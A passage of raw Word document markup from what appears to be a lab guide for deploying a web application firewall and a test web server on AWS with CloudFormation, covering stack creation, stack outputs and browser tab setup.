        <w:r w:rsidR="00033EBE" w:rsidRPr="00286DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI Light" w:hAnsi="Segoe UI Light"/>
          </w:rPr>
          <w:t>Custom Template</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00033EBE" w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> – Deploys WAF and Web server into existing </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00033EBE" w:rsidRPr="00286DC0">
        <w:t>subnet</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3272DE34" w14:textId="77777777" w:rsidR="00704F63" w:rsidRPr="00286DC0" w:rsidRDefault="00704F63" w:rsidP="00704F63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BD5523E" w14:textId="53F03277" w:rsidR="005C3C44" w:rsidRPr="00286DC0" w:rsidRDefault="005C3C44" w:rsidP="005C3C44">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc76995337"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve">Deploy the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t>Stack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="228D2992" w14:textId="77777777" w:rsidR="005C3C44" w:rsidRPr="00286DC0" w:rsidRDefault="005C3C44" w:rsidP="003650CA"/>
    <w:p w14:paraId="6E275B20" w14:textId="121AA088" w:rsidR="003650CA" w:rsidRPr="00286DC0" w:rsidRDefault="00A218D6" w:rsidP="003650CA">
      <w:r w:rsidRPr="00286DC0">
        <w:t>Log in to the AWS console and select the CloudFormation Service. Choose one of the four regions in North America:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F6B42A" w14:textId="37725B6D" w:rsidR="00A218D6" w:rsidRPr="00286DC0" w:rsidRDefault="00A218D6" w:rsidP="00A218D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00286DC0">
        <w:t>US East 1 (Virginia)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392A2AA8" w14:textId="02524DAF" w:rsidR="00A218D6" w:rsidRPr="00286DC0" w:rsidRDefault="00A218D6" w:rsidP="00A218D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00286DC0">
        <w:t>US East 2 (Ohio)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7AF2CA" w14:textId="25048D24" w:rsidR="00A218D6" w:rsidRPr="00286DC0" w:rsidRDefault="00A218D6" w:rsidP="00A218D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00286DC0">
        <w:t>US West 1 (Northern California)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA7687C" w14:textId="18A9CF82" w:rsidR="00A218D6" w:rsidRPr="00286DC0" w:rsidRDefault="00A218D6" w:rsidP="00A218D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00286DC0">
        <w:t>US West 2 (Oregon)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458A6A2B" w14:textId="6C65A45A" w:rsidR="00A218D6" w:rsidRPr="00286DC0" w:rsidRDefault="00A218D6" w:rsidP="00A218D6"/>
    <w:p w14:paraId="125EF16E" w14:textId="2B1DF9B1" w:rsidR="00A218D6" w:rsidRPr="00286DC0" w:rsidRDefault="00947762" w:rsidP="00A218D6">
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve">From the AWS console select </w:t>
      </w:r>
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Services &gt; Management &amp; Governance &gt; CloudFormation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB7E090" w14:textId="6ABAEB30" w:rsidR="00947762" w:rsidRPr="00286DC0" w:rsidRDefault="00947762" w:rsidP="00A218D6">
      <w:r w:rsidRPr="00286DC0">
        <w:t>(Tip: Click in the search box and type “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t>cloudf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t>” to navigate quickly to CloudFormation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDD7FC9" w14:textId="53B58645" w:rsidR="00947762" w:rsidRPr="00286DC0" w:rsidRDefault="00947762" w:rsidP="00A218D6">
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Create Stack</w:t>
      </w:r>
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> and then click “With new resources (standard)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ECE246" w14:textId="2E5662C6" w:rsidR="00947762" w:rsidRPr="00286DC0" w:rsidRDefault="00947762" w:rsidP="00A218D6">
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve">Scroll down to </w:t>
      </w:r>
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Specify template</w:t>
      </w:r>
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> and select </w:t>
      </w:r>
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Upload a template </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="43181DD2" w14:textId="047559F8" w:rsidR="00947762" w:rsidRPr="00286DC0" w:rsidRDefault="00947762" w:rsidP="00A218D6">
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Choose File</w:t>
      </w:r>
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> and then upload the CFT file you downloaded previously</w:t>
      </w:r>
      <w:r w:rsidR="002C31A1" w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> (e.g. “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002C31A1" w:rsidRPr="00286DC0">
        <w:t>waf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002C31A1" w:rsidRPr="00286DC0">
        <w:t>-new-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002C31A1" w:rsidRPr="00286DC0">
        <w:t>vpc.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002C31A1" w:rsidRPr="00286DC0">
        <w:t>”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2509216A" w14:textId="2002837E" w:rsidR="002C31A1" w:rsidRPr="00286DC0" w:rsidRDefault="002C31A1" w:rsidP="00A218D6">
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7B2A4E" w14:textId="7A0C2785" w:rsidR="002C31A1" w:rsidRPr="00286DC0" w:rsidRDefault="002C31A1" w:rsidP="00A218D6"/>
    <w:p w14:paraId="3F551061" w14:textId="761778B3" w:rsidR="00780B13" w:rsidRPr="00286DC0" w:rsidRDefault="00780B13" w:rsidP="00A218D6">
      <w:r w:rsidRPr="00286DC0">
        <w:t>Fill in the stack name and parameters. (Note: if you do not yet have a key pair for the current region, open a new browser tab, navigate in AWS console to EC2 &gt; Network &amp; Security &gt; Key Pairs, and create a new key pair.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7E5353" w14:textId="3F0A3A92" w:rsidR="00780B13" w:rsidRPr="00286DC0" w:rsidRDefault="00780B13" w:rsidP="00A218D6">
      <w:r w:rsidRPr="00286DC0">
        <w:t>The following is an example of a stack configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0675BC79" w14:textId="67184D53" w:rsidR="00780B13" w:rsidRPr="00286DC0" w:rsidRDefault="00780B13" w:rsidP="00A218D6">
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="158B6618" wp14:editId="7D5CAAFB">
            <wp:extent cx="5943600" cy="3568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8065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5B69F5" w14:textId="10A1931D" w:rsidR="00780B13" w:rsidRPr="00286DC0" w:rsidRDefault="00780B13" w:rsidP="00A218D6">
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28A4D327" wp14:editId="207EB054">
            <wp:extent cx="5943600" cy="3853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53815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="219566BA" w14:textId="06657B56" w:rsidR="00780B13" w:rsidRPr="00286DC0" w:rsidRDefault="00780B13" w:rsidP="00A218D6">
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CE5793F" wp14:editId="3D0BBD2F">
            <wp:extent cx="5943600" cy="124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43330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E393BC0" w14:textId="07DCA79B" w:rsidR="00780B13" w:rsidRPr="00286DC0" w:rsidRDefault="00780B13" w:rsidP="00A218D6"/>
    <w:p w14:paraId="371697E3" w14:textId="39B9F4E9" w:rsidR="00780B13" w:rsidRPr="00286DC0" w:rsidRDefault="00C16E3E" w:rsidP="00A218D6">
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next</w:t>
      </w:r>
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> to advance to </w:t>
      </w:r>
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configure stack options</w:t>
      </w:r>
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve">. No changes are necessary here. Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next</w:t>
      </w:r>
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> to advance the </w:t>
      </w:r>
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Review</w:t>
      </w:r>
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F41FCFA" w14:textId="3192EF18" w:rsidR="00C16E3E" w:rsidRPr="00286DC0" w:rsidRDefault="00C16E3E" w:rsidP="00A218D6"/>
    <w:p w14:paraId="6CEB3140" w14:textId="1A9B1569" w:rsidR="00C16E3E" w:rsidRPr="00286DC0" w:rsidRDefault="00C16E3E" w:rsidP="00A218D6">
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve">Scroll down and click </w:t>
      </w:r>
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Create Stack</w:t>
      </w:r>
      <w:r w:rsidRPr="00286DC0">
        <w:t>. The stack creation process begins. You will see a page that looks like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9116EA" w14:textId="04A3343D" w:rsidR="00C16E3E" w:rsidRPr="00286DC0" w:rsidRDefault="00C16E3E" w:rsidP="00A218D6">
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="092B3D92" wp14:editId="71347617">
            <wp:extent cx="5943600" cy="2337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37435"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0417C096" w14:textId="478A9A20" w:rsidR="00C16E3E" w:rsidRPr="00286DC0" w:rsidRDefault="00C16E3E" w:rsidP="00A218D6"/>
    <w:p w14:paraId="2B479EBC" w14:textId="7E530C1F" w:rsidR="00C16E3E" w:rsidRPr="00286DC0" w:rsidRDefault="00C16E3E" w:rsidP="00A218D6">
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve">The stack deployment will take several minutes. Click the refresh button to update the display. When the stack is finished deploying the status will change from CREATE_IN_PROGRESS to CREATE_COMPLETE. Click the </w:t>
      </w:r>
      <w:r w:rsidR="00C500EA" w:rsidRPr="00286DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Outputs</w:t>
      </w:r>
      <w:r w:rsidR="00C500EA" w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> tab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5304EB36" w14:textId="77777777" w:rsidR="00C500EA" w:rsidRPr="00286DC0" w:rsidRDefault="00C500EA" w:rsidP="00A218D6"/>
    <w:p w14:paraId="67324EA6" w14:textId="31A98BAB" w:rsidR="00947762" w:rsidRPr="00286DC0" w:rsidRDefault="0032467F" w:rsidP="00A218D6">
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="593E776C" wp14:editId="00720800">
            <wp:extent cx="5943600" cy="2781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81935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="505FE448" w14:textId="65CE9AC5" w:rsidR="0032467F" w:rsidRPr="00286DC0" w:rsidRDefault="0032467F" w:rsidP="00A218D6"/>
    <w:p w14:paraId="42146FE7" w14:textId="7AE0787E" w:rsidR="00F6591D" w:rsidRPr="00286DC0" w:rsidRDefault="00F6591D" w:rsidP="00A218D6">
      <w:r w:rsidRPr="00286DC0">
        <w:lastRenderedPageBreak/>
        <w:t>These values will be used in connecting to the WAF and web applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107B7C27" w14:textId="11CB5AA4" w:rsidR="00F6591D" w:rsidRPr="00286DC0" w:rsidRDefault="00F6591D" w:rsidP="00F6591D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t>PublicDNSName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> – not used in this </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t>lab</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4160F947" w14:textId="511FED30" w:rsidR="00F6591D" w:rsidRPr="00286DC0" w:rsidRDefault="00F6591D" w:rsidP="00F6591D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t>PublicIPAddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> – Public IP Address of the WAF. Use this IP to connect to the WAF admin UI and to simulate protected web </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t>traffic</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="50DB3C1A" w14:textId="6E549E54" w:rsidR="00F6591D" w:rsidRPr="00286DC0" w:rsidRDefault="00F6591D" w:rsidP="00F6591D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t>WAFInstanceID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> – Instance ID of the WAF EC2. This value is the admin password to log in to the WAF admin </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t>UI</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3F4AE2DE" w14:textId="438AB326" w:rsidR="00F6591D" w:rsidRPr="00286DC0" w:rsidRDefault="00F6591D" w:rsidP="00F6591D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t>WebServerIPAddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> – Public IP Address of the backend web server. Use this IP to connect directly to the web server to simulate unprotected web </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t>traffic</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3B078AB4" w14:textId="028A024E" w:rsidR="00F6591D" w:rsidRPr="00286DC0" w:rsidRDefault="00F6591D" w:rsidP="00F6591D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t>WebServerPrivateIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> – Private IP Address of web server. Use this when configuring the WAF listening </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t>services</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="57E52A9F" w14:textId="77777777" w:rsidR="00D92D0F" w:rsidRPr="00286DC0" w:rsidRDefault="00D92D0F" w:rsidP="00A218D6"/>
    <w:p w14:paraId="0C2E1A60" w14:textId="3B8BD85D" w:rsidR="007065B4" w:rsidRPr="00286DC0" w:rsidRDefault="007065B4" w:rsidP="007065B4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc76995338"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t>Prepare Browser Windows and Tabs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="5D325F4E" w14:textId="02AB03CE" w:rsidR="003650CA" w:rsidRPr="00286DC0" w:rsidRDefault="007065B4" w:rsidP="007065B4">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve">For the best experience in configuring the WAF and testing the web applications </w:t>
      </w:r>
      <w:r w:rsidR="00F6591D" w:rsidRPr="00286DC0">
        <w:t>open a new private browsing window (or “incognito” mode) in your browser of choice.</w:t>
      </w:r>
      <w:r w:rsidR="002A7B0C" w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> Open four more browser tabs in this window. The five tabs will be as follows:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1435"/>
        <w:gridCol w:w="3780"/>
        <w:gridCol w:w="4135"/>
      </w:tblGrid>
      <w:tr w:rsidR="0089134D" w:rsidRPr="00286DC0" w14:paraId="143493BC" w14:textId="77777777" w:rsidTr="006A5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890F6D8" w14:textId="0778BA36" w:rsidR="0089134D" w:rsidRPr="00286DC0" w:rsidRDefault="0089134D" w:rsidP="002A7B0C">
            <w:pPr>
              <w:pStyle w:val="ListNumber"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00286DC0">
              <w:t>Browser Tab</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3780" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A722450" w14:textId="0D59C96C" w:rsidR="0089134D" w:rsidRPr="00286DC0" w:rsidRDefault="0089134D" w:rsidP="002A7B0C">
            <w:pPr>
              <w:pStyle w:val="ListNumber"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00286DC0">
              <w:t>URL Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4135" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77E7D71E" w14:textId="0622B3FA" w:rsidR="0089134D" w:rsidRPr="00286DC0" w:rsidRDefault="0089134D" w:rsidP="002A7B0C">
            <w:pPr>
              <w:pStyle w:val="ListNumber"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00286DC0">
              <w:t>Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0089134D" w:rsidRPr="00286DC0" w14:paraId="533CC0A7" w14:textId="77777777" w:rsidTr="006A5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0566B0" w14:textId="3460C872" w:rsidR="0089134D" w:rsidRPr="00286DC0" w:rsidRDefault="0089134D" w:rsidP="006A5D68">
            <w:pPr>
              <w:pStyle w:val="ListNumber"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00286DC0">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3780" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40145443" w14:textId="7C5AA8A9" w:rsidR="0089134D" w:rsidRPr="00286DC0" w:rsidRDefault="0089134D"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rsidRPr="00286DC0">
              <w:t>http://&lt;PublicIPAddress&gt;:8000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4135" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66F15452" w14:textId="41EA5EBC" w:rsidR="0089134D" w:rsidRPr="00286DC0" w:rsidRDefault="006A5D68"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rsidRPr="00286DC0">
              <w:t>WAF admin UI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0089134D" w:rsidRPr="00286DC0" w14:paraId="5C95ED78" w14:textId="77777777" w:rsidTr="006A5D68">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="488884B1" w14:textId="7FF68FFB" w:rsidR="0089134D" w:rsidRPr="00286DC0" w:rsidRDefault="0089134D" w:rsidP="006A5D68">
            <w:pPr>
              <w:pStyle w:val="ListNumber"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00286DC0">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3780" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CB7B1F7" w14:textId="13413B31" w:rsidR="0089134D" w:rsidRPr="00286DC0" w:rsidRDefault="0089134D" w:rsidP="002A7B0C">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rsidRPr="00286DC0">
              <w:t>http://&lt;PublicIPAddress&gt;:80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4135" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E332EC5" w14:textId="74BB2B53" w:rsidR="0089134D" w:rsidRPr="00286DC0" w:rsidRDefault="00C3368C" w:rsidP="002A7B0C">
            <w:pPr>
              <w:pStyle w:val="ListNumber"/>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Badstore</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="006A5D68" w:rsidRPr="00286DC0">
              <w:t xml:space="preserve"> app, protected by WAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0089134D" w:rsidRPr="00286DC0" w14:paraId="0CA9EA8F" w14:textId="77777777" w:rsidTr="006A5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977786D" w14:textId="30FE96D5" w:rsidR="0089134D" w:rsidRPr="00286DC0" w:rsidRDefault="0089134D" w:rsidP="006A5D68">
            <w:pPr>
              <w:pStyle w:val="ListNumber"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00286DC0">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3780" w:type="dxa"/>
          </w:tcPr>
